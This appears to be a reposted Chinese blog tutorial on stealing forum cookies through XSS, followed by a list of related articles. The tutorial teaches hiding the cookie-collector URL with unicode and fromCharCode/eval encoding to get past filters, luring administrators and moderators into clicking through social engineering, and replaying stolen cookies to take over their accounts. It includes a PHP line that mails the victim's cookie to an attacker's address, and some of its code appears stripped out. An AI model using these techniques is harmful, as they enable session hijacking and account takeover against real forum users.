html文件中隐藏cookie,XSS攻击Cookie欺骗中隐藏JavaScript执行

最新推荐文章于 2022-11-06 17:06:26 发布
最新推荐文章于 2022-11-06 17:06:26 发布
阅读量205 收藏
点赞数
文章标签: html文件中隐藏cookie

信息来源:至尊宝的成长之路

比如发现一处可XSS地方:

自己弄个偷cookie的文件。

目的是让其他浏览者去浏览我们设计好的陷阱

怎么弄其实也不用我多说了。。

现在主要说的是如何隐藏JavaScript执行。

大家可能习惯每天去milw0rm.com看EXP,

每当发布XSS漏洞的EXP,当我们利用的时候。

却无法cookie任何信息,这是为什么呢。。

像魔力,PHPBB这样大型的论坛都具备XSS漏洞。

我给的这个

会显示Javascript 错误。

解决办法有2种,我们可以把外部敏感信息用unicode编码

给个URL:http://www.mikezilla.com/exp0012.html

通过编码就是这样:

上述还不行就用第2种方法

Javascript fromCharCode中的eval功能

上面说了可以用unicode编码过一些站

比如编码后的104,116,116,112就是HTTP

如果论坛用了其他的编辑器,比如PHPWind 用的所见所得编辑器

直接打上http://url.com肯定会暴露。

那么我们就看编辑器的形式来调换URL

比如偷COOKIE的站是http://www.URL.com

当然显示的部分你可以替换成吸引人的信息骗取管理和斑竹的点击

用一点社会工程学就可以了。。

好了现在都完成了初步的设想,开始实现吧

第1步:管理看见我们构造好的陷阱,并且点了他

第2步:Javascript 执行成功了。。。

第3步:构造好的偷COOKIE文件偷取到Cookie

第4步:我们不可能傻到URL连接是纯文本,将URL用Unicode编码(这里习惯说是加密)http://www.mikezilla.com/exp0012.html

第5步:截取的Cookie信息当然不是明文的,我们只要使用FireFox Cookie 编辑器

替换COOKIE就OK了,或者用CookieEditor等其他工具。。

个人建议:偷取Cookie不一定就使用空间收取Cookie信息

比如构造个邮箱收取就这样

mail("[email protected]","cookie monster",$_REQUEST['cookie']);

?>

好了偷到有价值的信息替换Cookie就行了。。替换斑竹的就是斑竹权限,替换管理的就和是管理权限。。

完了。。。。

weixin_42421284
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ThinkPHP 防范XSS攻击
H2912616818的博客
12-17 812
这是一篇关于XSS攻击防范的文章,主要是用来解决ThinkPHP5.1以下的
Cookie隐藏小广告
mysunshine
11-06 331
方式一:在close.php页面上设置COOKIE, colse.php页面 <?php setcookie('hide','1'); header('Location: indes.php'); index.php页面  <!DOCTYPE html> <html lang="en"> <head> <meta charset="U...
html输入框不显示cookie_jquery设置浏览器缓存cookie提示内容显示隐藏
weixin_39558521的博客
01-12 192
特效描述:设置浏览器缓存 cookie提示 内容显示隐藏,jquery制作通过判断各种浏览器版本等,来设置各个浏览器缓存cookie,控制模块内容或区域在浏览器缓存cookie的情况下,是否显示或隐藏等操作。代码结构1. 引入JS2. HTML代码$(function(){$('.WebDown .Close').click(function(){$('.WebDown').fadeOut(300...
会话跟踪技术介绍——cookie,url 重写, 隐藏表单域
scalad
10-29 2975
由于HTTP协议是一种无状态的协议,也就是说当用户请求一个资源,服务器端根据请求做出响应,回发到客户端后,就关闭了连接(HTTP无状态协议详细请参考我的另外一篇文章)  通俗易懂客户端与服务器端交互原理(HTTP数据请求与HTTP响应,包括Servlet部分) http://blog.csdn.net/lvpin/archive/2007/06/09/1645770.aspx 但是,我们在实际
XSS攻击
letterTiger的博客
07-28 1368
XSS全称叫做Cross Site Scripting(跨站脚本攻击),之所以不叫CSS是应为和层叠样式表重名(CSS)。 被攻击的原因就是执行了非本站的脚本,该脚本有无边恶意,会盗取用户信息(cookie等登录信息,页面上的其他一切信息)。 XSS攻击又被分为两种,一种是反射型,另一种是存储型。 反射型指的是攻击脚本并没有存入网站数据库,而是隐藏在链接,通过连接传播。只要用户点击了链接就...
js利用cookie实现记住密码功能
11-28
需要注意的是,虽然Cookie可以提供一定的便利性,但其存储的数据量有限(一般不超过4KB),且存在跨站脚本攻击(XSS)的风险。因此,对于敏感信息如密码,更好的做法是只存储一个用于验证的哈希值或一次性令牌,而...
cookiejavascript的使用技巧以及隐私在服务器端的设置
10-27
`secure`标志使Cookie只在HTTPS连接传输,而`httpOnly`则防止JavaScript通过`document.cookie`访问Cookie,增加抵御XSS攻击的安全性。例如,使用PHP的`setcookie()`函数设置一个安全且只允许HTTP传输的Cookie: ``...
CookieProt:Javascript Cookie XSS保护
05-24
CookieProt v 1.0 B 通过JavaScript从XSS保护cookie。 EPTO版权所有(C)2015 将此脚本放在所有内容的开头,以禁用[removed]。 它将通知用户尝试使会话无效。 会话将被破坏,服务器会将违规行为保存在日志
JavaScript cookie原理及使用实例
10-15
1. **XSS攻击**:XSS(Cross-Site Scripting)允许攻击者在受害者的浏览器执行恶意脚本。为了防止XSS攻击,需要对用户输入进行验证和过滤,避免在页面上直接显示未经处理的用户提交内容。 2. **CSRF攻击**:CSRF...
通过cookie记住密码-HTML样例源码
09-22
HTML,我们通常会使用JavaScript(或jQuery等库)来处理表单事件。例如,我们可以监听表单的提交事件,并在用户点击“登录”按钮时执行以下操作: ```javascript document.getElementById('loginForm')....
JS使用cookie实现DIV提示框只显示一次的方法
11-25
本文实例讲述了JS使用cookie实现DIV提示框只显示一次的方法。分享给大家供大家参考,具体如下: 这里运用JavaScriptcookie技术,控制网页上的提示DIV只显示一次,也就是当用户是第一次打开网页的时候才显示,第二次自动隐藏起来,很好的提升了用户体验,不会使用户烦感;利用Cookies,我们还可做超多的事情,慢慢体会吧。 运行效果截图如下: 在线演示地址如下: http://demo.jb51.net/js/2015/js-cookie-div-dlg-show-once-codes/ 具体代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD X
隐藏表单域,url,cookie,session
m0_46692762的博客
04-14 710
隐藏表单域: 隐藏域是用来收集或发送信息的不可见元素,对于网页的访问者来说,隐藏域是看不见的。当表单被提交时,隐藏域就会将信息用你设置时定义的名称和值发送到服务器上。 <input type="hidden" name="..." value="...">` 属性解释: type=“hidden” //定义隐藏域; name属性定义 //隐藏域的名称; value属性定义 //隐藏域的值 ...
XSS攻击解析
qq_59527682的博客
11-16 217
1.什么是XSS攻击   跨站脚本攻击(Cross Site Scripting),攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。2.转化思想防范xss攻击   修改application/config.php   注:在框架配置文件,配置的函数名称,如果写错,页面不会报错,只是所有接收的数据都是null.     'default_filter' => 'htmlspecialchars',3.过滤思想防
这些年我们用过的状态跟踪的方式(隐藏表单,cookie,session,token)
qq_43440348的博客
03-07 270
很久以前,Web 基本上就是文档的浏览而已,既然是浏览,作为服务器, 不需要记录谁在某一段时间里都浏览了什么文档,每次请求都是一个新的HTTP协议,就是请求加响应模型,是不用记住是谁刚刚发了HTTP请求,每个请求对客户端来说都是全新的. 但是随着交互式Web应用的兴起,像购物网站,就面临一个问题,那就是必须记住哪些人登录系统, 哪些人往自己的购物车放商品, 也就是说必须把每个人区分开,因为HTTP请求是无状态的,所以后面就有了状态跟踪. 状态跟踪的发展: 1.隐藏表单: 在所有页面,利用js 将用户ID
你可能不知道的cookie隐藏问题-JSON Parse error: Unterminated string
Annie的博客
05-29 4555
把登录信息使用cookie存储到客户端是稀松平常的操作,然而我在Safari浏览器上发现了问题。当登录成功后再刷新页面时,控制台报错:JSON Parse error: Unterminated string。查看原因,竟是因为cookie只存储了一半的信息,导致JSON解析发生错误。 开始以为是cookie内容存储过多,超出了最大存储量导致,但很快就推翻了这种想...
细读 JS | Cookie 详解
細水、長流√的专栏
11-06 2591
我们知道,Cookie 的读写是有差异的,读取的时候可以一次性获取当前作用域下的所用 Cookie,而写入的时候只能一条一条地进行写入操作。优先级,这是 Chrome 的提案,定义了三种优先级,Low/Medium/High,当 cookie 数量超出时,低优先级的 cookie 会被优先清除。只是一些场景下,我们需要来维护“状态”(指的是客户端与服务端会话的状态,而不是说给 HTTP 协议加个状态,这是不对的,也无法做到)。并发送服务端,服务端拿到这些信息就可以区分来自哪个用户的了,并存储到相应的表。
会话追踪--cookie/重写url/隐藏域/session
yangruxi的博客
07-28 3405
网络通信协议分类1.有状态的协议:TCP/IP,自从客户端与服务器连接上以后,这个连接会一直保持畅通,持续保持连接状态。 比如:打电话,从双方接通开始,一直到任何一方挂断电话位置,期间一直保持畅通。2.无状态的协议:HTTP,这是一种请求/响应模式的协议,当浏览器发起请求那一刻,与服务器建立了连接,当服务器给客户端浏览器做出响应后,连接就断了。 比如:今天打开一个网页,看大一条新闻,这个网页放
cookiexss攻击
最新发布
09-27
JavaScript ,XSS 攻击可能会利用 cookie 来窃取用户的敏感信息或在用户身份验证方面进行欺骗。 为了防止 XSS 攻击,可以采取以下措施: 1. 对用户输入进行正确的验证和过滤,以防止执行恶意脚本代码。 2. 在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值